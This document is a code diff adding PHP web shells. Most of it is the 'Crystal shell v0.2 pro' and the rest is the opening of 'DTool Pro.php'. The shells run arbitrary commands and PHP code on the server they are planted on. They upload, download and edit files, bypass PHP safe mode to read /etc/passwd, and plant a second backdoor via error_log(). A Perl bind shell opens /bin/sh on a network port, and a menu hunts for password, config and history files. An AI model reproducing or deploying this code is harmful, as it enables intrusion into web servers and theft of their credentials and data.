+<INPUT type=\"submit\" value=\"eval code\" id=input></form></div></td></table>";
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>Download here <b>from</b>:
+<INPUT type=\"text\" name=\"filefrom\" size=30 value=\"http://\">
+<b>-->>:</b>
+<INPUT type=\"text\" name=\"fileto\" size=30>
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\"></td><td>
+<INPUT type=\"submit\" value=\"Download\" id=input></td></tr></table></form></div>";
+}
+if ($act == "about") {echo "<center><b>Coding by:<br><br>Super-Crystal<br>&<br>Mohajer22<br>-----<br>Thanks <br>TrYaG Team <br> ArabSecurityCenter Team <br>CRYSTAL-H Version:0 Beta phpshell code<br>Saudi Arabic  </a>.</b>";}
+
+if ($act == "bind") {echo "<center><b>CRYSTAL-H:<br><br>-Connect Þã ÈÇáÖÛØ Úáì ÎíÇÑ.<br>.- ÈÚÏ ãÇíÊã ÇäÒÇá ÇáÓßÑíÈÊ ÈÇáãÌáÏ<br>.-ÊæÌå áÇÏÇÉ ÇáäÊ ßÇÊ æÊÕäÊ Úáì<br>nc -lp 3333ÈßÊÇÈÉ ÇáãäÝÐ - <br>ÇáÓßÑíÈÊ ÈáÛÉ ÇáÈíÑá <br>Bind port to  :<br> bind shell æåäíÆÇ ð áß   </a>.</b>";}
+
+if ($act == "command") {echo "<center><b>CRYSTAL-H:<br><br>áÃÎÊíÇÑ ÇáÇæÇãÑ ÇáÌÇåÒå  Select ------ x  ÇÖÛØ Úáì ÇáÎíÇÑ<br>.- æÇÐÇ ÇÑÏÊ ßÊÇÈå  ÇáÇæÇãÑ ÈäÝÓß ÞÏ ÊßÊÝí ÈÇáÎíÇÑ<br>Command   </a>.</b>";}
+
+if ($act == "team") {echo "<center><b>Arab Security Center Team<br><br>Super-Crystal<br>Medo-HaCKer<br>Anaconda<br>Alsb0r<br> ReeM-HaCK <br>NoOFa <br> AL-Alame<br>The YounG HackeR<br>Anti-Hack<br>Thanks  </a>.</b>";}
+if (array_key_exists('image', $_GET)) {
+	header('Content-Type: image/gif');
+	die(getimage($_GET['image']));
+}
+
+if ($act == "bypass") {
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+<table id=tb><tr><td>Execute:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\"></td></tr></table>
+";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with copy </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"copy\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with CuRl</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>read file :
+<INPUT type=\"text\" name=\"curl\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with imap()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td><select name=switch><option value=file>View file</option><option value=dir>View dir</option></select>
+<INPUT type=\"text\" name=\"string\" size=30 value=\"/etc/passwd\">
+<INPUT type=\"submit\" value=\"show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> bypass safemode with id()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<select name=plugin><option>cat /etc/passwd</option></select>
+<INPUT type=\"submit\" value=\"Show\" id=input></td></tr></table></form></div>";
+echo ("<FONT COLOR=\"RED\"> Exploit: error_log()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<INPUT type=\"text\" name=\"ERORR\" size=30 value=\"\">
+<INPUT type=\"submit\" value=\"Write\" id=input></td></tr></table></form></div>";
+}
+if ($act == "decoder"){
+echo ("<FONT COLOR=\"RED\"> replace Chr()</FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td>
+<textarea name=\"Mohajer22\" cols=\"50\" rows=\"15\" wrar=\"off\">
+</textarea><br>
+<INPUT type=\"submit\" value=\"Replace\" id=input></td></tr></table></form></div>";
+}
+if ($act == "SQL"){
+echo ("<FONT COLOR=\"RED\">   MySQL    </FONT>");
+echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<table id=tb><tr><td> Username :
+<INPUT type=\"text\" name=\"username\" size=30 value=\"\">\n
+password :
+<INPUT type=\"password\" name=\"password\" size=30 value=\"\">\n
+<input type=submit value='Enter'>\n
+<input type=reset value='Clear'></td></tr></table></form></div>";
+}
+?>
+
+
+
+<br>
+<TABLE style="BORDER-COLLAPSE: collapse; color:#000000" cellSpacing=0 borderColorDark=#DCE7EF cellPadding=5 width="100%" bgColor=#333333 borderColorLight=#C0C0C0 border=1><tr>
+	<td width="100%" valign="top" style="color: #00000" bgcolor="#000000">
+	<a bookmark="minipanel" style="font-weight: normal; color: #dadada; font-family: verdana; text-decoration: none">
+	<TABLE style="BORDER-COLLAPSE: collapse; font-family:Verdana; font-size:11px; color:#000000; background-color:#0000000" height=1 cellSpacing=0 borderColorDark=#000000 cellPadding=0 width="100%" bgColor=#000000 borderColorLight=#DCE7EF border=1>
+	<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+	<td width="990" height="1" valign="top" style="border:1px solid #00000; font-family: Verdana; color: #000000; font-size: 11px; "><p align="center">
+	&nbsp;</p>
+	<p align="center">&nbsp;<table style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+		<tr style="font-family: Verdana, Tahoma, Arial, sans-serif; font-size: 11px; color: red; background-color: #0000000">
+			<td style="font-size: 13px; font-family: verdana, arial, helvetica; color: red; background-color: #0000000">
+<?php
+// chr() //
+if(empty($_POST['Mohajer22'])){
+} else {
+$m=$_POST['Mohajer22'];
+$m=str_replace(" ","",$m);
+$m=str_replace("(","",$m);
+$m=str_replace(")","",$m);
+$m=str_replace(".",";",$m);
+$m=str_replace("chr","&#",$m);
+$m=str_replace(" ","",$m);
+echo $m ;
+}
+// ERORR //
+if(empty($_POST['ERORR'])){
+} else {
+$ERORR=$_POST['ERORR'];
+echo  error_log("
+<html>
+<head>
+<title> Exploit: error_log() By * Super-Crystal  * </title>
+<body bgcolor=\"#000000\">
+<table Width='100%' height='10%' bgcolor='#8C0404' border='1'>
+<tr>
+<td><center><font size='6' color='#BBB516'> By  * Super-Crystal * TrYaG Team</font></center></td>
+</tr>
+</table>
+<font color='#FF0000'>
+</head>
+<?
+if(\$fileup == \"\"){
+ECHO \" reade for up \";
+}else{
+\$path= exec(\"pwd\");
+\$path .= \"/\$fileup_name\";
+\$CopyFile = copy(\$fileup,\"\$path\");
+if(\$CopyFile){
+echo \" up ok \";
+}else{
+echo \" no up \";
+}
+}
+if(empty(\$_POST['m'])){
+} else {
+\$m=\$_POST['m'];
+echo  system(\$m);
+}
+if(empty(\$_POST['cmd'])){
+} else {
+\$h=  \$_POST['cmd'];
+ print include(\$h) ;
+   }
+
+
+?>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='file' name='fileup' size='20'>
+<input type='submit' value='  up  '>
+</form>
+<form method='POST'  action='Super-Crystal.php'>
+<input type='cmd' name='cmd' size='20'>
+<input type='submit' value='  open (shill.txt) '>
+</form>
+<form method='POST' enctype='multipart/form-data' action='Super-Crystal.php'>
+<input type='text' name='m' size='20'>
+<input type='submit' value='  run  '>
+<input type='reset' value=' reset '>
+</form>
+", 3,$ERORR);
+}
+// id //
+if ($_POST['plugin'] ){
+
+
+                                  switch($_POST['plugin']){
+                                 case("cat /etc/passwd"):
+                                           for($uid=0;$uid<6000;$uid++){   //cat /etc/passwd
+                                        $ara = posix_getpwuid($uid);
+                                                if (!empty($ara)) {
+                                                  while (list ($key, $val) = each($ara)){
+                                                    print "$val:";
+                                                  }
+                                                  print "<br>";
+                                                }
+                                        }
+
+                                break;
+
+
+                                                }
+                                               }
+
+// imap //
+$string = !empty($_POST['string']) ? $_POST['string'] : 0;
+$switch = !empty($_POST['switch']) ? $_POST['switch'] : 0;
+
+if ($string && $switch == "file") {
+$stream = imap_open($string, "", "");
+
+$str = imap_body($stream, 1);
+if (!empty($str))
+echo "<pre>".$str."</pre>";
+imap_close($stream);
+} elseif ($string && $switch == "dir") {
+$stream = imap_open("/etc/passwd", "", "");
+if ($stream == FALSE)
+die("Can't open imap stream");
+$string = explode("|",$string);
+if (count($string) > 1)
+$dir_list = imap_list($stream, trim($string[0]), trim($string[1]));
+else
+$dir_list = imap_list($stream, trim($string[0]), "*");
+echo "<pre>";
+for ($i = 0; $i < count($dir_list); $i++)
+echo "$dir_list[$i]"."<p>&nbsp;</p>" ;
+echo "</pre>";
+imap_close($stream);
+}
+// CURL //
+if(empty($_POST['curl'])){
+} else {
+$m=$_POST['curl'];
+$ch =
+curl_init("file:///".$m."\x00/../../../../../../../../../../../../".__FILE__);
+curl_exec($ch);
+var_dump(curl_exec($ch));
+}
+
+// copy//
+$u1p="";
+$tymczas="";
+if(empty($_POST['copy'])){
+} else {
+$u1p=$_POST['copy'];
+$temp=tempnam($tymczas, "cx");
+if(copy("compress.zlib://".$u1p, $temp)){
+$zrodlo = fopen($temp, "r");
+$tekst = fread($zrodlo, filesize($temp));
+fclose($zrodlo);
+echo "".htmlspecialchars($tekst)."";
+unlink($temp);
+} else {
+die("<FONT COLOR=\"RED\"><CENTER>Sorry... File
+<B>".htmlspecialchars($u1p)."</B> dosen't exists or you don't have
+access.</CENTER></FONT>");
+}
+}
+
+@$dir = $_POST['dir'];
+$dir = stripslashes($dir);
+
+@$cmd = $_POST['cmd'];
+$cmd = stripslashes($cmd);
+$REQUEST_URI = $_SERVER['REQUEST_URI'];
+$dires = '';
+$files = '';
+
+
+
+
+if (isset($_POST['port'])){
+$bind = "
+#!/usr/bin/perl
+
+\$port = {$_POST['port']};
+\$port = \$ARGV[0] if \$ARGV[0];
+exit if fork;
+$0 = \"updatedb\" . \" \" x100;
+\$SIG{CHLD} = 'IGNORE';
+use Socket;
+socket(S, PF_INET, SOCK_STREAM, 0);
+setsockopt(S, SOL_SOCKET, SO_REUSEADDR, 1);
+bind(S, sockaddr_in(\$port, INADDR_ANY));
+listen(S, 50);
+while(1)
+{
+	accept(X, S);
+	unless(fork)
+	{
+		open STDIN, \"<&X\";
+		open STDOUT, \">&X\";
+		open STDERR, \">&X\";
+		close X;
+		exec(\"/bin/sh\");
+	}
+	close X;
+}
+";}
+
+function decode($buffer){
+
+return  convert_cyr_string ($buffer, 'd', 'w');
+
+}
+
+
+
+function execute($com)
+{
+
+ if (!empty($com))
+ {
+  if(function_exists('exec'))
+   {
+    exec($com,$arr);
+   echo implode('
+',$arr);
+   }
+  elseif(function_exists('shell_exec'))
+   {
+    echo shell_exec($com);
+
+
+   }
+  elseif(function_exists('system'))
+{
+
+    echo system($com);
+}
+  elseif(function_exists('passthru'))
+   {
+
+    echo passthru($com);
+
+   }
+}
+
+}
+
+
+function perms($mode)
+{
+
+if( $mode & 0x1000 ) { $type='p'; }
+else if( $mode & 0x2000 ) { $type='c'; }
+else if( $mode & 0x4000 ) { $type='d'; }
+else if( $mode & 0x6000 ) { $type='b'; }
+else if( $mode & 0x8000 ) { $type='-'; }
+else if( $mode & 0xA000 ) { $type='l'; }
+else if( $mode & 0xC000 ) { $type='s'; }
+else $type='u';
+$owner["read"] = ($mode & 00400) ? 'r' : '-';
+$owner["write"] = ($mode & 00200) ? 'w' : '-';
+$owner["execute"] = ($mode & 00100) ? 'x' : '-';
+$group["read"] = ($mode & 00040) ? 'r' : '-';
+$group["write"] = ($mode & 00020) ? 'w' : '-';
+$group["execute"] = ($mode & 00010) ? 'x' : '-';
+$world["read"] = ($mode & 00004) ? 'r' : '-';
+$world["write"] = ($mode & 00002) ? 'w' : '-';
+$world["execute"] = ($mode & 00001) ? 'x' : '-';
+if( $mode & 0x800 ) $owner["execute"] = ($owner['execute']=='x') ? 's' : 'S';
+if( $mode & 0x400 ) $group["execute"] = ($group['execute']=='x') ? 's' : 'S';
+if( $mode & 0x200 ) $world["execute"] = ($world['execute']=='x') ? 't' : 'T';
+$s=sprintf("%1s", $type);
+$s.=sprintf("%1s%1s%1s", $owner['read'], $owner['write'], $owner['execute']);
+$s.=sprintf("%1s%1s%1s", $group['read'], $group['write'], $group['execute']);
+$s.=sprintf("%1s%1s%1s", $world['read'], $world['write'], $world['execute']);
+return trim($s);
+}
+
+
+
+
+
+
+if(isset($_POST['post']) and $_POST['post'] == "yes" and @$HTTP_POST_FILES["userfile"][name] !== "")
+{
+copy($HTTP_POST_FILES["userfile"]["tmp_name"],$HTTP_POST_FILES["userfile"]["name"]);
+}
+
+if((isset($_POST['fileto']))||(isset($_POST['filefrom'])))
+
+{
+$data = implode("", file($_POST['filefrom']));
+$fp = fopen($_POST['fileto'], "wb");
+fputs($fp, $data);
+$ok = fclose($fp);
+if($ok)
+{
+$size = filesize($_POST['fileto'])/1024;
+$sizef = sprintf("%.2f", $size);
+print "<center><div id=logostrip>Download - OK. (".$sizef."??)</div></center>";
+}
+else
+{
+print "<center><div id=logostrip>Something is wrong. Download - IS NOT OK</div></center>";
+}
+}
+
+if (isset($_POST['installbind'])){
+
+if (is_dir($_POST['installpath']) == true){
+chdir($_POST['installpath']);
+$_POST['installpath'] = "temp.pl";}
+
+
+$fp = fopen($_POST['installpath'], "w");
+fwrite($fp, $bind);
+fclose($fp);
+
+exec("perl " . $_POST['installpath']);
+chdir($dir);
+
+
+}
+
+
+@$ef = stripslashes($_POST['editfile']);
+if ($ef){
+$fp = fopen($ef, "r");
+$filearr = file($ef);
+
+
+
+$string = '';
+$content = '';
+foreach ($filearr as $string){
+$string = str_replace("<" , "&lt;" , $string);
+$string = str_replace(">" , "&gt;" , $string);
+$content = $content . $string;
+}
+
+echo "<center><div id=logostrip>Edit file: $ef </div><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=content cols=100 rows=20>$content</textarea>
+<input type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<input type=\"hidden\" name=\"savefile\" value=\"{$_POST['editfile']}\"><br>
+<input type=\"submit\" name=\"submit\" value=\"Save\" id=input></form></center>";
+fclose($fp);
+}
+
+if(isset($_POST['savefile'])){
+
+$fp = fopen($_POST['savefile'], "w");
+$content = stripslashes($content);
+fwrite($fp, $content);
+fclose($fp);
+echo "<center><div id=logostrip>saved -OK!</div></center>";
+
+}
+
+
+if (isset($_POST['php'])){
+
+echo "<center><div id=logostrip>eval code<br><form action=\"$REQUEST_URI\" method=\"POST\"><textarea name=phpcode cols=100 rows=20></textarea><br>
+<input type=\"submit\" name=\"submit\" value=\"Exec\" id=input></form></center></div>";
+}
+
+
+
+if(isset($_POST['phpcode'])){
+
+echo "<center><div id=logostrip>Results of PHP execution<br><br>";
+@eval(stripslashes($_POST['phpcode']));
+echo "</div></center>";
+
+
+}
+
+
+if ($cmd){
+
+if($sertype == "winda"){
+ob_start();
+execute($cmd);
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+else{
+ob_start();
+echo decode(execute($cmd));
+$buffer = "";
+$buffer = ob_get_contents();
+ob_end_clean();
+}
+
+if (trim($buffer)){
+echo "<center><div id=logostrip>Command: $cmd<br><textarea cols=100 rows=20>";
+echo decode($buffer);
+echo "</textarea></center></div>";
+}
+
+}
+$arr = array();
+
+$arr = array_merge($arr, glob("*"));
+$arr = array_merge($arr, glob(".*"));
+$arr = array_merge($arr, glob("*.*"));
+$arr = array_unique($arr);
+sort($arr);
+echo "<table><tr><td>Name</td><td><a title=\"Type of object\">Type</a></td><td>Size</td><td>Last access</td><td>Last change</td><td>Perms</td><td><a title=\"If Yes, you have write permission\">Write</a></td><td><a title=\"If Yes, you have read permission\">Read</a></td></tr>";
+
+foreach ($arr as $filename) {
+
+if ($filename != "." and $filename != ".."){
+
+if (is_dir($filename) == true){
+$directory = "";
+$directory = $directory . "<tr><td>$filename</td><td>" . filetype($filename) . "</td><td></td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+
+}
+
+if (is_readable($filename) == true){
+$directory = $directory . "<td>Yes</td>";}
+else{
+$directory = $directory . "<td>No</td>";
+}
+$dires = $dires . $directory;
+}
+
+if (is_file($filename) == true){
+$file = "";
+$file = $file . "<tr><td><a onclick=tag('$filename')>$filename</a></td><td>" . filetype($filename) . "</td><td>" . filesize($filename) . "</td><td>" . date("G:i j M Y",fileatime($filename)) . "</td><td>" . date("G:i j M Y",filemtime($filename)) . "</td><td>" . perms(fileperms($filename));
+if (is_writable($filename) == true){
+$file = $file . "<td>Yes</td>";}
+else{
+$file = $file . "<td>No</td>";
+}
+
+if (is_readable($filename) == true){
+$file = $file . "<td>Yes</td></td></tr>";}
+else{
+$file = $file . "<td>No</td></td></tr>";
+}
+$files = $files . $file;
+}
+
+
+
+}
+
+
+
+}
+echo $dires;
+echo $files;
+echo "</table><br>";
+
+
+
+
+echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">
+
+
+Directory:<INPUT type=\"text\" name=\"dir\" size=30 value=\"";
+
+echo getcwd();
+echo "\">
+<INPUT type=\"submit\" value=\"..Exec..\"></form>";
+
+
+
+
+
+if (ini_get('safe_mode') == 1){echo "<br><font size=\"3\"color=\"#cc0000\"><b>SAFE MOD IS ON<br>
+Including from here: "
+. ini_get('safe_mode_include_dir') . "<br>Exec here: " . ini_get('safe_mode_exec_dir'). "</b></font>";}
+
+
+
+
+?> </td></tr></table></p></td></tr></table></a><br><hr size="1" noshade><b></form></td></tr></table><br><TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr><td width="100%" height="1" valign="top" colspan="2" bgcolor="#000000"><p align="center">
+	<b>
+	:: </b>
+	<font face=Verdana size=-2><a href="?act=command">Executed command</a></font><b> ::</b></p></td></tr><tr><td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000; border: 1px solid #000000"><center><b>
+	<?
+	echo "
+<form action=\"$REQUEST_URI\" method=\"POST\">
+Command:<INPUT type=\"text\" name=\"cmd\" size=30 value=\"$cmd\">";
+?>
+		<input type="submit" name="submit1" value="Command" style="border: 1px solid #000000"><font face="Wingdings 3" color="#DCE7EF" size="3">f</font></form><p>
+	&nbsp;</p>
+	</td>
+	<td width="50%" height="1" valign="top" bgcolor="#000000" style="color: #000000"><center>
+	<form action="?act=cmd" method="POST"><input type="hidden" name="act" value="cmd"><input type="hidden" name="d" value="c:/appserv/www/shells/">
+		<font color="#DCE7EF">Select</font><font face="Wingdings 3" color="#DCE7EF" size="3">g</font><select name="cmd" size="1"><option value="ls -la">
+		-----------------------------------------------------------</option>
+		<option value="ls -la /var/lib/mysq">ls MySQL</option>
+		<option value="which curl">cURL ?</option>
+		<option value="which wget">Wget ?</option>
+		<option value="which lynx">Lynx ?</option>
+		<option value="which links">links ?</option>
+		<option value="which fetch">fetch ?</option>
+		<option value="which GET">GET ?</option>
+		<option value="which per">Perl ?</option>
+		<option value="gcc --help">C gcc Help ?</option>
+		<option value="tar --help">tar Help ?</option>
+		<option value="cat /etc/passwd">Get passwd !!!</option>
+		<option value="cat /etc/hosts">Get hosts</option>
+		<option value="perl --help">Perl Help ?</option>
+		<option value="find / -type f -perm -04000 -ls">
+		find all suid files</option><option value="find . -type f -perm -04000 -ls">
+		find suid files in current dir</option><option value="find / -type f -perm -02000 -ls">
+		find all sgid files</option><option value="find . -type f -perm -02000 -ls">
+		find sgid files in current dir</option><option value="find / -type f -name config.inc.php">
+		find config.inc.php files</option><option value="find / -type f -name &quot;config*&quot;">
+		find config* files</option><option value="find . -type f -name &quot;config*&quot;">
+		find config* files in current dir</option><option value="find / -perm -2 -ls">
+		find all writable directories and files</option><option value="find . -perm -2 -ls">
+		find all writable directories and files in current dir</option><option value="find / -type f -name service.pwd">
+		find all service.pwd files</option><option value="find . -type f -name service.pwd">
+		find service.pwd files in current dir</option><option value="find / -type f -name .htpasswd">
+		find all .htpasswd files</option><option value="find . -type f -name .htpasswd">
+		find .htpasswd files in current dir</option><option value="find / -type f -name .bash_history">
+		find all .bash_history files</option><option value="find . -type f -name .bash_history">
+		find .bash_history files in current dir</option><option value="find / -type f -name .fetchmailrc">
+		find all .fetchmailrc files</option><option value="find . -type f -name .fetchmailrc">
+		find .fetchmailrc files in current dir</option><option value="lsattr -va">
+		list file attributes on a Linux second extended file system</option><option value="netstat -an | grep -i listen">
+		show opened ports</option></select><input type="hidden" name="cmd_txt" value="1">&nbsp;<input type="submit" name="submit" value="Execute" style="border: 1px solid #000000"></form></td></tr></TABLE><a bookmark="minipanel" href="?act=bind"><font face="Verdana" size="-2">Bind port to</font><font face="Webdings" size="5" color="#DCE7EF">Â</font></a><font color="#00FF00"><br>
+</font>
+<a bookmark="minipanel">
+<TABLE style="BORDER-COLLAPSE: collapse" cellSpacing=0 borderColorDark=#666666 cellPadding=5 height="1" width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1>
+<tr>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><form method="POST">
+	<p align="center">
+<a bookmark="minipanel">
+	<b><font face="verdana" color="red" size="4">
+	<a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel">
+	<font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><a href="?act=edit" bookmark="minipanel"><span lang="en-us"><font face="Verdana" size="2">Edit/Create
+	file</font></span></a><b><font face="verdana" color="red" size="4"><a style="font-weight: normal; font-family: verdana; text-decoration: none" bookmark="minipanel"><font face="verdana" size="2" color="#DCE7EF">::</font></a></font></b><font face="Wingdings 2" size="2">&quot;</font></p><p align="center">
+	&nbsp;<?
+if ($act == "edit") {echo "<center><b>ÇáÊÍÑíÑ æÇáÇäÔÇÁ:<br><br> Þã ÈæÖÚ ÇÓã ÇáãáÝ ÇáÐí ÊÑíÏ ÊÍÑíÑå ÝÞØ<br>æÈÚÏ ÐÇáß ÇáÖÛØ Úáì config.php ãËÇá<br>Edit<br>ÓÊÙåÑ áß äÇÝÐå ÈåÇ ãÍÊæíÇÊ ÇáãáÝ <br>æÇíÖÇ ð ÇÐÇ ÇÑÏÊ ÇäÔÇÁ ãáÝ ÝÞØ ÖÚ ÇÓãå ãÚ ÇáÇãÊÏÇÏ <br>æÈÚÏ ÐÇáß ÇßÊÈ ãÇÊÑíÏ washer-crystal.txt   </a>.</b>";}
+?>
+	</p>
+	<p>&nbsp;</p>
+	<p>	<?
+	echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\">
+File to edit:
+<input type=\"text\" name=\"editfile\" >
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() ."\">
+<INPUT type=\"submit\" value=\"Edit\"></form></div>";
+?>
+	</p>
+	</form></center></p></td>
+ <td width="50%" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+                 <?
+if ($act == "upload") {echo "<center><b>ÑÝÚ ÇáãáÝÇÊ:<br><br>Þã ÈÊÍÏíÏ ÇáãáÝ ÇáãÑÇÏ ÑÝÚå <br>æÈÚÏ ÐÇáß Þã ÈÇáÖÛØ Úáì ÇáÎíÇÑ ÇáãæÖÍ<br>UPLOAD< </a>.</b>";}
+?><a bookmark="minipanel"><b><font size="2">::
+	</font>
+	</b><a href="?act=upload"><span lang="en-us"><font face="Verdana" size="2">
+					upload</font></span></a><b><font size="2">::</font></b><font face=Webdings size=2>&#325;</font><font size="2"></a></a></font><br><form method="POST" ENCTYPE="multipart/form-data"><input type="hidden" name="miniform" value="1"><input type="hidden" name="act" value="upload">&nbsp;
+		<?
+		echo "<div><FORM method=\"POST\" action=\"$REQUEST_URI\" enctype=\"multipart/form-data\">
+<INPUT type=\"file\" name=\"userfile\">
+<INPUT type=\"hidden\" name=\"post\" value=\"yes\">
+<INPUT type=\"hidden\" name=\"dir\" value=\"" . getcwd() . "\">
+<INPUT type=\"submit\" value=\"Download\"></form></div>";
+?>
+	<p></form></p></td>
+
+</tr>
+</table>	</a><p><br></p><TABLE style="BORDER-COLLAPSE: collapse" height=1 cellSpacing=0 borderColorDark=#666666 cellPadding=0 width="100%" bgColor=#333333 borderColorLight=#c0c0c0 border=1><tr>
+	<td width="990" height="1" valign="top" style="color: #DCE7EF" bgcolor="#000000"><p align="center">
+	<b>
+	&nbsp;</b><font face="Wingdings 3" size="5">y</font><b>Crystal shell v. <span lang="en-us">0.2</span> <span lang="en-us">pro</span>&nbsp; </b><font color="#CC0000"><b>©oded by</b> </font><b><span lang="en-us"><a href="http://www.arab4services.com/home">Arab4Services.Com</a></span> |<span lang="en-us">Super-Crystal</span> </b><font face="Wingdings 3" size="5">x</font></p><p align="center">&nbsp;</p></td></tr></table>
+
+</a>
+
+
+<div align="right">
+
+<span lang="en-us">&nbsp;</span></div></body></html>

php/DTool Pro.php

@@ -0,0 +1,198 @@
+<?php
+
+if(empty($chdir)) $chdir = @$_GET['chdir'];
+if(empty($cmd)) $cmd = @$_GET['cmd'];
+if(empty($fu)) $fu = @$_GET['fu'];
+if(empty($list)) $list = @$_GET['list'];
+
+if(empty($chdir) or $chdir=='') $chdir=getcwd();
+$cmd = stripslashes(trim($cmd));
+
+
+//CHDIR tool
+if (strpos($cmd, 'chdir')!==false and strpos($cmd, 'chdir')=='0'){
+	$boom = explode(" ",$cmd,2);
+	$boom2 = explode(";",$boom['1'], 2);
+	$toDir = $boom2['0'];
+
+	if($boom['1']=="/")$chdir="";
+	else if(strpos($cmd, 'chdir ..')!==false){
+		$cadaDir = array_reverse(explode("/",$chdir));
+
+		if($cadaDir['0']=="" or $cadaDir['0'] ==" ") $lastDir = $cadaDir['1']."/";
+		else{ $lastDir = $cadaDir['0']."/"; $chdir = $chdir."/";}
+		$toDir = str_replace($lastDir,"",$chdir);
+		if($toDir=="/")$chdir="";
+	}
+	else if(strpos($cmd, 'chdir .')===0) $toDir = getcwd();
+	else if(strpos($cmd, 'chdir ~')===0) $toDir = getcwd();
+
+	if(strrpos($toDir,"/")==(strlen($toDir)-1)) $toDir=substr($toDir,0,strrpos($toDir,"/"));
+	if(@opendir($toDir)!==false or @is_dir($toDir)) $chdir=$toDir;
+	else if(@opendir($chdir."/".$toDir)!==false or @is_dir($chdir."/".$toDir)) $chdir=$chdir."/".$toDir;
+	else $ch_msg="dtool: line 1: chdir: $toDir: No such directory.\n";
+	if($boom2['1']==null) $cmd = trim($boom['2']); else $cmd = trim($boom2['1'].$boom2['2']);
+	if(strpos($chdir, '//')!==false) $chdir = str_replace('//', '/', $chdir);
+}
+if(!@opendir($chdir)) $ch_msg="dtool: line 1: chdir: It seems that the permission have been denied in dir '$chdir'. Anyway, you can try to send a command here now. If you haven't accessed it, try to use 'cd' in the cmd line instead.\n";
+$cmdShow = $cmd;
+
+//To keep the changes in the url, when using the 'GET' way to send php variables
+if(empty($post)){
+	if($chdir==getcwd() or empty($chdir) or $chdir=="")$showdir="";else $showdir="+'chdir=$chdir&'";
+	if($fu=="" or $fu=="0" or empty($fu))$showfu="";else $showfu="+'fu=$fu&'";
+	if($list=="" or $list=="0" or empty($list)){$showfl="";$fl="on";}else{$showfl="+'list=1&'"; $fl="off";}
+}
+
+//INFO table (pro and normal)
+if (@file_exists("/usr/X11R6/bin/xterm")) $pro1="<i>xterm</i> at /usr/X11R6/bin/xterm, ";
+if (@file_exists("/usr/bin/nc")) $pro2="<i>nc</i> at /usr/bin/nc, ";
+if (@file_exists("/usr/bin/wget")) $pro3="<i>wget</i> at /usr/bin/wget, ";
+if (@file_exists("/usr/bin/lynx")) $pro4="<i>lynx</i> at /usr/bin/lynx, ";
+if (@file_exists("/usr/bin/gcc")) $pro5="<i>gcc</i> at /usr/bin/gcc, ";
+if (@file_exists("/usr/bin/cc")) $pro6="<i>cc</i> at /usr/bin/cc ";
+$safe = @ini_get($safemode);
+if ($safe) $pro8="<b><i>safe_mode</i>: YES</b>, "; else $pro7="<b><i>safe_mode</i>: NO</b>, ";
+$pro8 = "<i>PHP </i>".phpversion();
+$pro=$pro1.$pro2.$pro3.$pro4.$pro5.$pro6.$pro7.$pro8;
+$login=@posix_getuid(); $euid=@posix_geteuid(); $gid=@posix_getgid();
+$ip=@gethostbyname($_SERVER['HTTP_HOST']);
+
+//Turns the 'ls' command more usefull, showing it as it looks in the shell
+if(strpos($cmd, 'ls --') !==false) $cmd = str_replace('ls --', 'ls -F --', $cmd);
+else if(strpos($cmd, 'ls -') !==false) $cmd = str_replace('ls -', 'ls -F', $cmd);
+else if(strpos($cmd, ';ls') !==false) $cmd = str_replace(';ls', ';ls -F', $cmd);
+else if(strpos($cmd, '; ls') !==false) $cmd = str_replace('; ls', ';ls -F', $cmd);
+else if($cmd=='ls') $cmd = "ls -F";
+
+//If there are some '//' in the cmd, its now removed
